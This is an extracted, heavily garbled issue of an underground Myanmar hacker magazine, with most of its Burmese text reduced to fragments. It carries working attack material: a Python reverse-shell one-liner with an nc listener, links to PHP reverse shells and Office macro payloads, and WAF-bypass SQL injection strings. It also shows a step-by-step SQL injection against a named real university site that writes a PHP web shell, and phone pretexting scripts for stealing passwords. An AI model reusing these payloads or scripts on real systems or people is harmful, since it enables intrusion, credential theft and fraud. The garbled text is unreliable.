Professional Documents
Culture Documents
UG@Magazin
UG@Magazin
LAZYSYSADMIN WRITEUP 40
W S ၐ Load_File ႔ 60
Http-Parameter-Pollution 70
CTF Experience 78
RED ROOM 81
HISTORY OF HACKING 85
SOCIAL ENGINEERING 92
D // D ‘t 162
197
႔ ။
။
။
။
႔ ။
႔ Wikipedia ႔ Website
႔ ၊ ၊
၍ ၊
Movie ။Google ႔
search engine
။ ႔ ႔ ၍
။ ၏
။
၍ ၏
။ ႔ ၐ
။ ႔ ။
Cloud storage ၐ ႔ ၊Online shopping ၊ ၐ
။ website ။
။ Security
။ ႔ ႔ Security ၊
၍ Security
႔ ။ Online ႔
။ ႔
။
Internet ၐ social
network ၐ ။
Facebook account ၍
။
D ၊ ၐ
။ ။ ။
၍ ။ ၍
ၐ ။
၍
၍ ႔
၏ ။
Security ။Target ( )
႔ ။ ။System Information
Pentesting ။
႔ ။
lock ႔ ႔ ။
။ ႔ lock
႔ ၊ S t
။ System T t S t S
။ Attacker ( H System
။ P
Target System information ။
information gathering ႔ ။ footprinting or enumeration ႔
။
Target – google.com
Target – twitter.com
Target – amazon.com
2.Enumerating Subdomain
1. Sublist3r
Download - https://github.com/aboul3la/Sublist3r
./sublist3r.py -d google.com -t 3
2.enumall
Download - https://github.com/jhaddix/domain
./enumall.py yahoo.com
3. Aquatone
Download - https://github.com/michenriksen/aquatone
Aquatone-discover -d corp.yahoo.com
3.Build Technology
Target ။
target system exploit ႔ ။
Browser extension ႔ ။ C view page
souce ။
Whatweb
CMSMap
Crawling ။ t t
။ Scann Crawling R t scan ။
scan ။ crawling process
scan ။
5. Port Scanning
6. SSL Checks
t ။
႔ clients report t
။ Ref - http://blog.gaurangbhatnagar.com/2017/07/10/Art-of-Enumeration.html
Blog ။
Min KoKo
Power By Union Of Underground Myanmar Hackers
17 | P a g e UG MAGAZINE VOL 2 Produced By MBH
Google ။
။ weak ။
GHDB Hacking ။ T t F D t
႔ ။ Google 1997 September 15 Register ။
Company 1998 ။ ႔G D
႔ Hacker ။ C D t
။
https://www.exploit-db.com/google-hacking-database/
S ။ ႔
။Search box ။Key
၊ ၊ ။ ။ ” ‖ ႔
‖ ‖ ႔ ႔ ။ ။ Key
။
Dork ။
Inurl
website URL t V ။
Myanmar customs
http://www.myanmartradeportal.gov.mm/index.php?r=site/display&id=770
။ ext: t t ။
Ext:sql site:go.id
http://pauddikmasjateng.kemdikbud.go.id/ecourse/ekursus_1_nop_2016.sql
႔ down Udmey t t ။
။ Tut title :download ။ tutname ext:rar
။ ။
။ t
။ goldchannel gold channel ၐ
။ goldechannel :myanmar
။Crack t t t ။ Inurl
intext ၐ ႔ ။
႔ ႔
။Dork simple ၐ exploit-db
။
………………။
Zen Zue
Requirement:
- PhPmyadmin (http://www.phpmyadmin.net/)
Step – 1
root@mnh:~# php -v
root@mnh:~# mysql -V
mysql Ver 14.14 Distrib 5.5.40, for debian-linux-gnu (i686) using readline 6.2
Step – 2
Wordpress ႔ P P
Step – 3
Terminal
root@mnh:~# cd /var/www/phpMyAdmin-4.3.6-all-languages/
root@mnh:~# /var/www/phpMyAdmin-4.3.6-all-languages
root@mnh:~#mkdir config
# t ။
#chmod o+w t ။{ # }
။
Step – 4
User='root';
―NEW-ROOT-PASSWORD‖ ႔ Password )
P ―NEW-ROOT-PASSWORD‖ ႔ ႔ Password ။
Step – 5
Step – 6
http://localhost/wordpress/wp-admin/setup-config.php
wordpress
define('DB_NAME', 'wp_mybaby');
define('DB_USER', 'root');
define('DB_PASSWORD', 'iloveu');
႔ ၃ save as ႔ wp-config.php ။
Wordpress register ။
DNS IP Name ႔ ႔ ။ IP ႔N
change ။ ႔ ႔ ။
( ) ။ ႔ Change
႔ ။ Change ။ ။ ( )
႔N ႔ ၐ ႔။ ၁ ၂
( ) ။ ႔
။ Number ႔ ႔ ― (၁ ၂ ၅/
‖120005‖ ။” ၐ ႔ ( ႔ ၐ
႔ ၐ ။
N t ၐ IP domain name ႔ ၐ IP ႔ ၐ
။ ႔ (www.facebook.com) ႔ ၐ ႔ ႔ IP
31.13.78.35 facebook.com ( Number
) ႔ IP D
System DNS Server (Domain Name System Server) ။
O SUSE L 42 1 64 ၐ DNS Serv I t t C t
။DNS Server ( BIND) package file terminal
။
#vi /etc/named.conf
forwarders {10.10.10.10; };
# #
t ။ t ႔ ။ Line 67
။ ႔ ။
named.conf file ။
၁ ။ zone file named.conf zone
file ႔ ။( ၁ ၁ ႔ )
― ‖{
type master;
― t / ‖;
};
type master;
― t /192 168 1 54 ‖;
};
#vi /etc/resolv.conf__
#touch /var/lib/named/master/192.168.1.54.zone
#vi /var/lib/named/master/192.168.1.54.zone
#touch /var/lib/named/master/mrsurf.zone
#vi /var/lib/named/master/mrsurf.zone
A t DNS S t ။
T …
Surf
M t XSS A ႔ hijack
။ Download ။
https://github.com/DisK0nn3cT/CookieCatcher
Free Hosting ႔ ။
Admin X P ။
႔ Xss Payload .. C C t
။
Admin ႔ ႔ ႔ C
။ ! :D
႔ Admin ႔ ။ Admin C ။
08iq0nf......! Ok :) C C t ။Admin Web ႔ IP
။ H C ။ ႔ C
! PHPSESSID=08iq0nf...... ။
Go Response ။
LAZYSYSADMIN WRITEUP
ssh,http,mysql,samba t ႔ ။Port 80
nikto tool ႔ ။ nikto -h 192.168.43.67
folder ။
႔ ႔ - ႔ ။
DB_USER – Admin
DB_PASSWORD – TogieMYSQL12345^^
႔ phpmyadmin login ႔ ။
။ ႔ ။ sudo
password ။
Facebook - https://www.facebook.com/waiyanhtet007
A macro is a feature that allows users to create automated processes inside of a document
used by software like Microsoft Word, Excel, or PowerPoint. This is used to enhance user
experience, increase productivity, or automate otherwise manual tasks. But, in other words, it
executes code. What kind of code? Well, pretty much whatever you want, even a Meterpreter
session!
P.S – P t I ‘t D ‘t tt t ;
Macro attacks are nothing new or unusual.A typical attack usually involves embedding
malicious macro code in an Office document, sending it to the victim, and asking him or her
t t t T t t ‘t t tt ,
basically begging the victim to run your malware. It's that people have been falling for this
t ! L t‘ t t
2. You can find usages by simply run unicorn.py. Type following command to create macro.
6. Copy macro code from powershell_attack.txt that was generated from unicorn. Then paste
it.
7 M t ―E M -E W ‖
type.
9. Success.
https://www.youtube.com/watch?v=OzekG1I-do0
https://thehackernews.com/2017/10/ms-office-dde-malware.html
I t t t , I‘
Truly,
Optimus Prime
A reverse shell works by the remote computer sending its shell to a specific user, rather than
binding it to a port, which would be unreachable in many circumstances. This allows root
commands over the remote server. reverse shell Server reverse connect
။ reverse connect ။Local host port 443
list target port connect ။
nc -lnvp 443
In target console,
E t reverse ။ t t ။
Command :
https://pastebin.com/raw/EcKH5Ah4
Perl extension ႔ ၐ ။
I t script run ။
$$ : perl script.pl
P t attacker revrse ။
Console t ႔ ။
python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ipa
ddress",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
In attacker machine ,
python ႔reverse ႔ ။
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-
shell.php
Script
C t ။
For Window
https://raw.githubusercontent.com/Dhayalanb/windows-php-reverse-shell/master/Reverse
Shell.php
Window reverse ။
www.site.com/details.php?sid=1%27%20order%20by%2010--%20-
www.site.com/details.php?sid=1'%0border%0bby%0b10--
www.site.com/details.php?sid=1'/**/order/**/by/**/10-- -
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns
+where@:=export_set(5,export_set(5,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!5
0000table_name*/,2)),@,2)
T F R ………
W S ၐ Load_File ႔
႔ ၊Loa
d_file ႔ ႔ ၊T t ႔
( .. :P ) ႔ T t ။(
။:D ) ။
႔
column count ၊ inject ႔၊
WAF(Web Application Firewall) Bypass ၊
Data ႔ ၊ P H ႔ crack ၊
Admin Panel ႔ ( Facebook
႔ ႔)။ … ႔
။ ၐ
A t website ႔ ။
….
SQL V ႔ website ႔-
tt :// t t / ? t = 0 ။ SQL V
႔ inject admin user & password ႔t D t
႔ ႔ (၁) ႔ ႔ ႔
။
(၁)
႔ ။ ။( ၊ )။
႔ ႔ ႔ ႔ ။ ႔ ႔
load_file ။ Load_File ႔
႔ ၐ F ႔ ။
Load_File L S ၐ /etc/passwd ၊ /etc/hosts
၊ Windows Server ။ ႔? !!
SQLi Vulnerable Test SQL Error Message ႔ ႔ File Document Directory
ၐ ႔ ႔ ။OK… SQL Error Message
C:\xampp\htdocs\found.php ..Server Admin ႔ ႔ website t
။ … ႔ load_file found.php ႔ F
read ႔ ၐ ႔ -
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,load_file("C:\\x
ampp\\htdocs\\found.php"),3,4,5,6,7,8,9,10,11--+
G t ! It‘ ။ ႔
႔ ၊ ႔ ။ ႔
႔ ။load_file ၐ
read ႔ ႔ ၊write ႔ ႔ ႔
႔ -
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,group_concat(
user,0x3a,file_priv),3,4,5,6,7,8,9,10,11 from mysql.user--+
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,group_concat(
user,0x3a,file_priv),3,4,5,6,7,8,9,10,11 from mysql.user where user=0x7375706572--+
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,"<?
system($_GET['cmd']); ?>",3,4,5,6,7,8,9,10,11+into+outfile+'C:\xampp\htdocs\cmd.php'--+
http://library.northsouth.edu/cmd.php
႔ ၊Directory ႔ 'C:\\xampp\\htdocs\\cmd.php'
႔ File ႔ -
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,"<?
system($_GET['cmd']); ?>",3,4,5,6,7,8,9,10,11+into+outfile+'C:\\xampp\\htdocs\\cmd.php'--
+
A S E M ? ၊ Browser ႔ cmd.php ႔F
႔ -
။) ။ ႔ ။ ႔ eval code
႔ ႔ ႔ -
http://library.northsouth.edu/cmd.php?cmd=dir
႔ ႔
။Server ႔ ႔ Security
႔ ႔ ႔ H
hacked
႔ ။ ႔ ႔ ႔
dir command file & directory list ၐ ႔
website file ႔ i.php
။
႔ i.php ႔ ၊
႔ ႔ ႔ ႔ ႔ -
http://library.northsouth.edu/found.php?author=hell'+UNION+ALL+SELECT+1,load_file("C:\\x
ampp\\htdocs\\i.php"),3,4,5,6,7,8,9,10,11--+
႔။ ။ view source
။ ၊ ႔
obfuscated ။
႔ ႔ shell upload ။
Http-Parameter-Pollution
Introduction
W A t D t sanitize
Http Parameter (e.g:GET/POST/Cookie) ႔ Attacker P t
။ Web Application
t ႔ ႔ ။
႔ Web Application U I t
။
Table
။ ႔ Website ႔ Http Protocol ႔R t
Website ႔ Server ႔ ။ R t
႔ ? Htt R t Htt P t ၐ D t
Transfer ႔ GET/POST Request ႔
Table ႔ -
Host: www.myanmarmiss.com
User-Agent: Safari/535.1
Accept: text/html,application/xhtml+xml
Host: www.myanmarmiss.com
User-Agent: Safari/535.1
Accept: text/html,application/xhtml+xml
param1=value1& param2=value2
User-Agent:Modzilla/5.0
Host: Host
Accept:*/*
User-Agent:Modzilla/5.0
Host: Host
Accept:*/*
Cookie: a = 3, a = 4
Content-Length: 7
Connection: close
a=5&a=6
http://www.yourwebsite.com/index.php?page=profile.php&id=1&username=zer0flag&userna
me=$n1ff3rg0d
.. ႔ T ႔ ။
႔ ၊
႔ User ႔ ႔ t ႔ ‗ ‘ ‗=‘ ႔ ‗ ‘
႔ W A t ၊ ..
။ ႔
SQL Injection Attack ။ ႔ SQL Injection WAF ႔
႔ Bypass ႔ ၊ SQL Injection ႔
http://www.target.com/index.aspx?id=-
1/*&id=*/UNION/*&id=*/SELECT/*&id=*/username&id=password/*&id=*/FROM/*&id=*/us
ers–
Url : http://missmyanmar.com/missmsf.jsp?poll_id=1111
႔ ၊ Myanmar ႔ ႔
႔ miss ။ ႔ miss Myanmar ႔ vote
။ poll_id Web Developer sanitize ႔
႔V ႔။ Attacker ႔P t ႔ link
t ။
CTF Experience
Lover
၊ t t ၊ laptop
t ။ wifi internet ၊ network cable ctf
challenge server access ႔ ။ ႔Team IP address 4 ။
physical machine ip address ။ Virtual Box Bridge Adapter
ip address ။ ip address t t ႔ ။ network monitoring ip
address 4 ႔ ။ network setting ။
challenge 5 ။ category
Reversing 50/300 ၊ Network ( agent44 ) ၊ Memory forensics 100 ၊ crypto ႔
။( ။) reversing
R ။re-50 analysis
။ file download ။ file signature zip flie ႔
extract ။ jrafile ။file extension file
signature data ။ exiftool mp3
audacity raw_import method import F ၐ
။ ၊ speed slowest ၊ t
ၐ ႔ ။
M F ႔ score board
၊ hint ႔ C Graph ႔ ။
Team ႔ ။ ၊ ၊
႔ ႔ first score ၂ ႔
flag submit ႔ ။ ႔ Japapn Secon Guest ႔
Air Ticket ။ Facebook
႔ CTF experience ႔ ၊ InfoSec Field
Noted
C hint ႔ ။
( japan )
* ) experience ႔ ။
*) ။
Thanks You.
။
( ႔ ။)
Lover
RED ROOM
Dark Web
Deep Web
RED ROOM
Deep Web
႔ ။ ။ ၊
၊P ၊ ။ ႔ 2014 April Operation Israel
Anonymous ႔ 2014 #OpIsrael
Anonymous Arab ႔ ႔ ။
…။
႔ L St Email ႔ Bt A ။ Bitcoin
ဏ ႔ ႔ ဏ ။
Master ႔ ႔ 0.70 BTC ႔
။ BTC ႔ PGP Encryption Encryption Method Email
Keys ႔ ႔ ။ Surface Web Protonmail
႔ M Dark Web
႔ ။ Corpse Husband Horrifying Deep Web
Stories "W I Q t H ‖ Videos
။Red Room ႔ Cuture ႔ ၁၉၇၆ Snuff ႔
၁၉၈ Cannibal Holocaust ႔ ။
G V t ႔
။
Dark Web H ။
Technical Dark Web
။ Dark Web S t D t
။ Trace ႔ S t
႔ Financial Theft ။ Botnet Repository
။ B M t ႔
ၐ ။ C t C
။ Dark Web ဏ
႔ ၊ ႔ ။Dark Web TOR I2P ႔
network ။
။
Dark Web D tM t ။D tM t
AlphaBay ။ AlphaBay Feds ၂ ၁၇ ၊
။ http://pwoah7foa6au2pul.onion/
။ Silk Road 3 ။
႔ Awareness ႔ ။ ။
G ႔ ။Tor T t ။
Dr.t3rr0r(AnonCoders)
HISTORY OF HACKING
Dr.t3rr0r(AnonCoders)
Hacking ။ Hacking ။
။
" ။ "
Anonymous Facebook ၐ computer
။
Hacking ၒ ၊
႔ ။ ။
Hacking ၁၈၇၈ ။
၁၈၇၆ ။၁၈၇၈
( ) ႔ S t
႔ ။
။ ႔ ႔ Hacking
႔ Michael Devitt ႔ ။
Hacker ။ ၁၉၅ ႔
၁၉၆ ႔ ႔ ။
ဏ ၊ ႔ ၑ Mainframe Computer
။ M C t
။ ႔ ႔
။ Kevin Mitnick ႔
Kevin Poulsen ႔ ၐ Hacker
။
PHREAKERS:
Phreakers ၐ ။ Wikipedia
Phreaking
“P hreaking is a slang term coined to describe the activity of a culture of people who study,
experiment with, or explore telecommunication systems, such as equipment and systems
t t t t ‖
႔ ။ ႔
၊ ႔ ၐ
႔ ။
Phreaking A C ၊ A T ၊ PBX ႔S t
႔ ။ Shoulder
Surfing ။ ။
Facebook R ၐ ။P ။ Burte Force
Attack ႔ ႔ W -D ။
႔ ႔ ။ War-Dial
ၐ ။
Tools Description
Red
ၐ ႔t ။
Box
Black
။
Box
Cheese P P P P
Box ။
Agua
T ။
Box
Blast M
Box ။
Blotto
ၐ ။
Box
Blue
2600-H T ။
Box
Bud
။
Box
Color
။
Box
Copper
Cr T Att D ။
Box
Infinity
R t A t t ။
Box
Mauve
T ။
Box
Diverter ၐ ။
Hackers
၊ Hacking
၁၉၇၁ John Draper
2600-hertz audio tone
ဏ ၐ ဏ
။ Captain Crunch ႔ Temper
႔ ။
။
Hacking ႔
။ Kevin Mitnick C t
S t C t ။
။ C t C ။ Kevin
Mitnick c0mrade ႔ ။ Defense
Threat Redu -ction Agency of U.S. Department of Defense Miami-Dade School
System ႔ BellSouth ႔ Backdoor
U ,P ႔ Email Account ။
။ U.S. Missile Command
။ ။
Dr.t3rr0r(AnonCoders)
=========================================================
Information Warfare ၂
။ ၂ ဏ
႔ ။ ၍ ႔ ၍
။Cyber Space
႔ ။
၄ ၍ ။ Fire Sale ႔ ၐ
။ Live Free or Die Hard ။
႔ ႔ ။ -
႔ (Disrupting Transpotation)၊
(Stealing and Destroying Financial)၊
(Disabling of Public Utilities) ၍
(Creating Fear with Media) ႔ ။
။
Disrupting Transpotation
႔
။
ၐ ။
။ ႔ ၍
၊ ၊
၊ ၒ ႔
ၐ ၒ ႔ ၐ ။
ၐ ႔ ၊ ၐ ဏ
ၒ ၐ ။ ႔
။
႔ ၍
၊ ဏ ၊ ဏ
႔ ၊ ၊ ၊
႔ ႔ ။ /
ၐ ။
႔ ႔ ၐ
ၐ ။ L B
V ၁၆.၇၅ ႔
ၐ ။
- ၊
။ ၊
၍ ၐ
ၐ ။ ၊ ႔ ၊ ၊
၊ ။
႔ ႔ ႔ t
႔ ။
( )
႔
။
UGMH
။ ။
G4 MHU
SOCIAL ENGINEERING
၁။ Network Adminstrator ႔ ႔ D t
Security Software System ။ ႔
႔ Network
-
( ) IDS/IPS system
( ) Antivirus system ။
၃။ Social Engineering ႔၏ ၊
႔ ၊ ၊ ၊ ႔ ၍
။
၄။ Social Engineering ၏
ၐ ၍ Attacker
။ ။
႔ Net -work data ႔
။
( ) Pretexting
( ) Diversion theft
( ) Phishing
( ) Baiting
Pretexting
၇။ Pretexting ႔ Company
data Server User Name
၊Password Attacker Hacking Technical
၍ ။ ႔ ႔
၏ Username၊ Password Social Security Number၊ Telephone Number၊ Date Of Birth
႔ ။ Attacker
Company ႔ ။၄ ႔
႔ Company ၏ Reception ႔ ႔
။
၉။ Administrator ၃ ၁ ႔
၍ ႔ ၊ ႔ ႔
၍ ။ ႔ ဏ၏ ႔
၊ ဏ ၊ ၊
Password ႔ Pretexting Social
၁ ။ Network Administrator
၍ User Name Password ။ Attacker
၍ ။
Network Administrator ႔
၊ ။ UserName
Password UserName Password
-
ATTACKER: ၊ ။
RECEIVER: ၊S R D t ။
ATTACKER: ။
RECEIVER: ။
ATTACKER: ႔ Sever ႔
။ User Name ႔ Password ။
Sever Restart ။
RECEIVER: ဏ ။ Restart ။ ။
ATTACKER: ဏ ။ .............. ။
RECEIVER: ။
ATTACKER: ။ User Name Password ႔ Sever
။
RECEIVER: ႔ ။
ATTACKER: User Name ႔ Password ဏ ။
႔။ ။
RECEIVER: ။ Username mgkoko
Password ၂၂၃ ။
ATTACKER: ။ See You Tomorrow ။
RECEIVER: Ok Ok ။
ATTACKER: ၊ ႔ ။
RECEIVER: ၊ ႔ ၊ ႔ ။
ATTACKER: ။
RECEIVER: ၊ ႔ ။
Attacker ၎ ၏
။
Attacker: ႔ ။ ႔ ႔
႔ Mail save ႔ ႔
႔ ။ ႔ ။
၊ ။ Mail Password ( Password)
။ ။
၁၃။ ၏ Password
Attacker ၏ Mail ၊
႔ ။
Power By Union Of Underground Myanmar Hackers
97 | P a g e UG MAGAZINE VOL 2 Produced By MBH
၁၅။ Pretexting ၊
၍ ။ Pretexting
၆ ။၎ ႔ -
( ) ႔၏ Personal ၊ Emai
႔ ၊ Website ။
( ) Password ႔၏ ၊ ႔၏ ၊ ႔၊
၊ ႔၊ ႔ ။
( ) ႔၏ ဏ ႔ ၊ Pretexting
။
(ဃ) ၍ ၊
M ။
( ) Pretexting ၏
၍၎ ႔ Pretexting
။
( ) ႔၏ ၊ ၊
၏
႔ ။
၁၆။ ႔ ၊ ႔၏ ၎ ႔
၍ Pretexting ႔၏
။ ၎ ႔
၍ ၊
၍ ႔ ။ ႔၏ Password
။၎ Password Account
။Pretexting ႔
ၒ ။ Attacker
၎ ။
Diversion Theft
Attacker: ႔ ။
Reciver: ။ ႔ ။
Attacker: ႔ ႔ ႔ ။
Reciver: ။
Attacker: ။ ႔ ႔ ဏ ႔
႔ ႔ ။ ႔ ႔
၇၃ x ၇၄ ၊ ၊၅ ႔ ၈ x ၈၁
႔ ။
Reciver: ႔ ႔ ၊ ႔
။ ။
၁၈။ Attacker Pretexting
။
Attacker: ႔ ၊
၁၂/ ( )၁ ၁ ၂၆ ။
Reciver: ဏ ။ ။
႔ ။
Attacker: ။ ႔ ႔။
Reciver: ႔ ၂ ။ ၄ /၁၂၃၄ ။
Attacker: ။
၁၉။ Attacker ႔ ႔
။ ၎ ၍
။ Diversion Theft ႔ ႔
၍ ။ ဏ ႔
၍ Pretexting ႔ ႔
၍ ။ ႔ ၏
၍ ။ ဏ
။ Attacker
၍ ။ ဏ
။ Attacker ။
ဏ ႔
။ ။ ႔
၊ ႔ ၍ ။ Attacker ၎ ႔
၎၏ ။ ႔
၍ ႔ ၍ -
Reciver: ။ ဏ ။
Attacker: ႔ ။
Reciver: ။
Attacker: ႔ ၁၂/ ( )၁ ၁ ၂၆ ။
၂ ။ Attacker ဏ ႔ ၊
၍ ၍ ၍
။၎
။
Reciver: ။ ႔ ။
Attacker: ။ ႔။ ( ႔
၊ ) ႔ ။ ႔ ႔
႔ ။
၂၁။ Attacker ႔ ၊ ၐ ၍
႔ ၊ ႔ ဏ ႔
။ ဏ ႔
Attacker ။
၍ Att
။ ၍ O B S t Attacker
႔ ၏ Personal ဏ
ID Account ႔
။ ၎ Diversion Theft ၊ ၍
။
။
။ ၎
-
Reciver: ။
Attacker: MD ။ ႔
႔ ။ ။
Reciver: ။ ႔ ႔ ။
၂၂။ Attacker ၎ ၏ ၏
။ ႔ Attacker ၍
။ ၍ ႔ ၊ ႔ ၊ ႔
၍ ။
Attacker: ႔ ႔ ။ ။
Mail aaa@adi.com ႔ ။၅ ႔
႔ ။
Reciver: ႔ ။ ။
၂၃။ Attacker ၊ ႔ ၏
Attacker ၏ Mail ႔ ။ ႔
Phishing
၎ Web Page ၏
Personal ၊ Password ၊ Bank Account ႔
႔ ။ Attacker P Web
Page ၍ ။ ၏
Bank Account S t U t Bank Account
႔ ဏ ။ ၍ Update
Account
။ ၎ U t Link
http:\\Security.company.com\update\ update.html ႔ ၊
Login.html Att Phishing Web page Link ၍ Mail ႔
P Att ။၎ Phishing Attack
Domain Name ၍ Login Page
Power By Union Of Underground Myanmar Hackers
102 | P a g e UG MAGAZINE VOL 2 Produced By MBH
Web page ႔ ၍ P ႔
။
၂၅။ ႔ ၎ ႔၏ ၊
Phishing Mail
Phishing Attacking ။
Phisher ၎ ၍ ၎၏ Data
။ ႔ ၊
႔ ၏ Bank Account ႔
Bank
။ ႔ ၊
Mail Link၊ Domain Name
။ ဏ Website security.company
Web page link / ။ ၎ Phishing Domain
Phishing ႔ ။
http:// t P
http://www.mircor-soft.com ၊ http://www.micorsoft.com ႔ ။ ႔
Phis M ။Phishing
-
( )Bank ဏ Personal M
Email ၍ ။
( )Bank ဏ Personal M ၍
Account ၍ ႔
။
၂၆။ Phishing
E Website ၍ ႔
။ Internet User Website ၊ UserName Account
P Website ႔ ၎
Cookies Computer ။ ၎
Cookies Internet ။
၍ Cookies User User
Name Password ၊ U R t User Register ႔
Power By Union Of Underground Myanmar Hackers
103 | P a g e UG MAGAZINE VOL 2 Produced By MBH
User ႔ ႔ ။ ႔ Phisher
Website ၍
Link Website ႔ C Phishing
။ Link C Cookies Phisher
႔ ။ ႔ Phisher User Name Password ၊ ၏
Personal ႔ ။ ႔ P L
Vulneravilities W ၊PDF ႔
၍D ႔ ၊
O R P ။
၍ ၎ D File Trojan
Phisher ႔ ႔ ။ O R
File Data Phisher ႔ ႔
။ ႔ ႔ Website ၊ Internet
Security System O R ႔ ။
Email Login Page Email Link / File Storage Size ၍ Email Link ၍
P ။ ႔ Email Page Website
၊ Security ၍ ၍ ၊
Website Email ႔ Webpage
။ Phisher
Phishing Webpage ။ Phishing Email
F Mail ၊ Mail
႔ ။
Attacker: ၁- ၉၂၉ ။
Receiver: ၉၂၉ ။ ။
Attacker: mail4u Service Network Admin ။
Power By Union Of Underground Myanmar Hackers
104 | P a g e UG MAGAZINE VOL 2 Produced By MBH
Receiver: ။mail4u ။
။
Attacker: ႔ mail4u Service Server Hard Disk System
Error D t
႔
Receive: M ။
Attacker: M ။ M
႔ User Name Password ႔ ။
Receiver: ႔ Company ႔ ။
Attacker: ၊ Customer ႔ P
။ ၍ User P
၏ M
။
Receiver: ၊ ။ Username achitkoko Password
၂၉၁၈၂၇၃ ။ M ႔ ။
၂၈။ ၄ Company ၍
Username Password ။ Attacker
၍ ၍
။
Attacker: ၁- ၉၂၉ ။
Receiver: ၉၂၉ ။ ။
Attacker: mail4u Service Network Admin ။
Receiver: ။ mail4u ။
။
Attacker: Mail Account M
႔ ႔ ။ ၍
႔ ႔
၏ Mail Account ။
Receiver: ။ Mail ။
Attacker: ၊ ႔ Report ။ ၍
Username Password
။ ႔ Account
႔ ႔ ။
႔ ႔ Username Password ႔
႔ ႔ ။ ၍ ၵ
Account ။
Receiver: ၊ Account ။
Account ။ Username Moethout
Password ၂၆၃၇၄၈၃၇ ။
၂၉။ Phone Phishing ၊
၍ ။O B S t ၏
Account
ဏ ၍ ႔၏
ဏ Account ၏ Username ၊ Password Phone Phishint
၍ ။ ႔ Phone Phishing
Company ၏ Network System Company
Company
။
၃ ။ ၍ Social Engineering
၍ ။
၍ Account ၊
၊
၊ ၐ ၍ ႔ ။
Phone Phishing P ၏ ၐ
၄ ႔ ။ ႔ ႔
၍
။ Phone Phishing
၄ ၏ ႔
။
Baiting
႔ ၊ Company
၊ Antivirus Company Software ၊ Hardware P t
႔
။ Baiting Social Engineering
Computer ႔
Computer Company ႔
၏ Computer ၍
။ B t ၊
။
Chatting ။
Instant Messaging System C tt
Social Engineering ၍ ။C tt
၏ ၊
။
၍ C tt
။ ၍
၏ ။
၊ ၍ ၊ ၍
႔ ။ ႔၏
႔ ၐ ။ ၍ ဏ
။ C tt Social Engineering ၏
႔၏ ။
၊
၊E ၍
၍ ၊ ႔
။
Mail4u Service
Mail Address Social Engineering ၍ Mail Password
။Mail4u Company
။
၏ ၍ Mail Service Company P
Password
၍ ။Mail Service Company ၄ ႔
၍ ။ ႔
Company ႔ ၊
Company Mail Password ။ ႔
၏
႔
။
။ ၐ ၐ ႔
။
။ ႔၏ ၊
႔
။ Social Engineering
၍ ။ ႔
၊
။ ၏ ၍ Mail ၊ Password ႔ S
၍ ။ ႔ ႔၏
။ Phisher
Spam Mail ႔ ၍
။ ႔၏ ႔၏
။ ၍ Mail 24 Hours
Account
၍ ။
Mail Account S ၍ ။
Network Administrator ႔
၍ ၏ Network ၊ ၄ ၏ Network ႔ ၍ ႔
။ ၓ ၏
ၓ ၍ ၊E ႔
။ Social
Engineering ။
။ ၍ ၄ Social
E ၏ ၄ ၐ
။ ႔ Social Engineering
g4 MHU
BITCOIN ( BTC )
H1N1 And Naing Lin Oo
Bitcoin ၊၂ ၈
S t N t ၊ ႔ ႔ ႔
။ Bitcoin
၊ ၐ
၊ Bt ၂ ၉
1 BTC USD 4 D ၂ ၁၇ 1 BTC
USD 16860 Dollar ၊ Bitcoin
ဏ
႔ ၊
DOCKER (၁)
႔ ( IT ) Docker
၊ ။
Docker
Performance ။ Containerization ႔
Virtualization ။
။
Docker Installation
https://www.docker.com/pricing
Docker Install ႔ C ။
openSuSE ႔ ။
#zypper in docker
D t t t ။
T tI H run ။
H dock ။
Docker Build -> Ship -> Run ႔ ႔
Developement Build ႔ ။ ႔ run ႔ ။
I ႔ ။Docker O ၊ D
D I ။
။
https://hub.docker.com/explore/
Development Environmet ။ ။
။
D C C t S t
။
Docker ႔ ႔
။
Develpoer
႔ ႔ D ႔ ႔ ။
Mobile Phone operating system (IOS,Android,java and etc )
application D ။ ႔
Website Developer ၊software developer ၊game developer ၊ application developer ၊ iOS
developer ၊ android developer ႔ D
။ ႔ ႔ ၊ ႔
။ ႔ programming ဏ
။ ႔ ႔ Security
။ Developer
။
Pentester
Pentester Programming ။ ႔ ႔
programming ႔ ၊ zero day exploit
Website, software, game , application,operating system Pentest ။
Bug ႔ ၐ developer D
။ ႔ ႔ ၊
Developer ႔ company ႔ ။
Developer ႔ company ႔ ။ Developer ႔ Pen-
tester ႔ ။
website t
။ Website ၊ ႔ ၏
ၐ ။
Facebook ႔ Website
Facebook White Hat list ဏ ။
Facebook White hack list ဏ ။ Ebay website
ဏ ။ Ebay ၏ White Hack List
။ pentester
။
P t t ။ Google search
engine website
။ t ။H ၊
၊ ၊
၊ ႔
။
။ t t ၍ Developer ႔
t ။
t t
။
website ၊ ၊
website ။
။ H website
၍ " Error " ၐ ။ ႔
ၐ ။ website
server ၏
။
ၐ ။ ႔ app website
။ ႔ t t t
။ pentester website t t ၍
႔ ႔ ။ Developer
pentester ၊ cyber space
…။
Cyber Warfare
- ၂၁ ႔ ႔ War ။
႔ Media Media War ။ ႔
Commercial War ။ ႔ ႔ Online
Hack Cyber War ။ ႔
၊ ၊ ၊ ၊ ႔
႔ ႔ ႔ Cyber War ႔ ၊Cyber War
၊ Cyber War ႔ ႔ ႔
E-Govermence / E-Commerce / Communication System O ၐ
။
႔ ႔
Estonia ႔ ၂ ႔ ႔ ႔
႔ ႔ ။
-၂ ၇ C ႔ M t A
H 1 T t / G 1000 I t
Download ႔ ။
- ၂ ၉ ၁ Government ႔ P t
O t t GhostNet ႔ ၐ ႔ Cyber Spy Network
႔ ။
-၂ ၈ ႔ ႔ ။ ၃
t G tW t t
Deface ။DDoS ။ W t M C
႔ ႔ ။ R t ႔
႔ ႔ ႔ ။
႔ ႔ ..
- Cyber War ႔ ။
႔။
- Cyber Attack ႔ C D
႔ ။
